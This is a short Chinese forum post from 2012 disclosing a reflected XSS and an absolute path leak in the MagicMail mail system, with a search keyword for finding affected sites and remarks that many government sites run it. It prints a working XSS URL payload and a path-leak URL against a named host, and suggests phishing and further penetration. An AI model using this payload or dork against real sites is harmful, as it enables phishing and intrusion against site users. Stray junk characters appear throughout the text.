找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1803|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞! m$ O" F- u$ b3 [

+ `# k6 E& t4 H3 U - a" N9 a$ S4 Y
包含  一个反射性XSS  以及  绝对路径泄漏% P% I0 F7 P# I2 }  c/ t# ?' ^* K
看了看 貌似全部是linux的。# P- x6 k5 N+ M+ }' n7 f/ Q

1 |: d* i: y9 t: ^关键字:迈捷邮件系统 by MagicMail& f: E  e% t  {# \3 H7 V" F, g: q

5 j" f8 d9 D4 C: v4 m可以看到很多政府网站都用这个邮件系统8 W0 r" h- W% F. c. b
, k: g3 ?0 o  U! Z) F4 a) F1 V4 |
绝对路径 http://madman.in/index.php?login_type=declare&language=
- ^: [: N/ F* _$ B4 u# {
) Q0 o/ b7 e5 B$ z% r
  S) K4 I8 ^: p& S" u& u/ _" n( s* S# I( K! {+ e, |6 X/ C" E: n7 H
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E. A( V9 D( z5 W' e/ R5 p9 Q

8 f6 K0 _  a8 S5 I  A! w' ?* i. o  i$ D) _- n8 y( ^

/ n; C9 E& ~, x虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等- e4 C' S7 h0 v4 @
; m/ {. v' o" u; v( [
修复方案:看官方补丁吧。; q3 u+ ^$ y8 W- P- D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表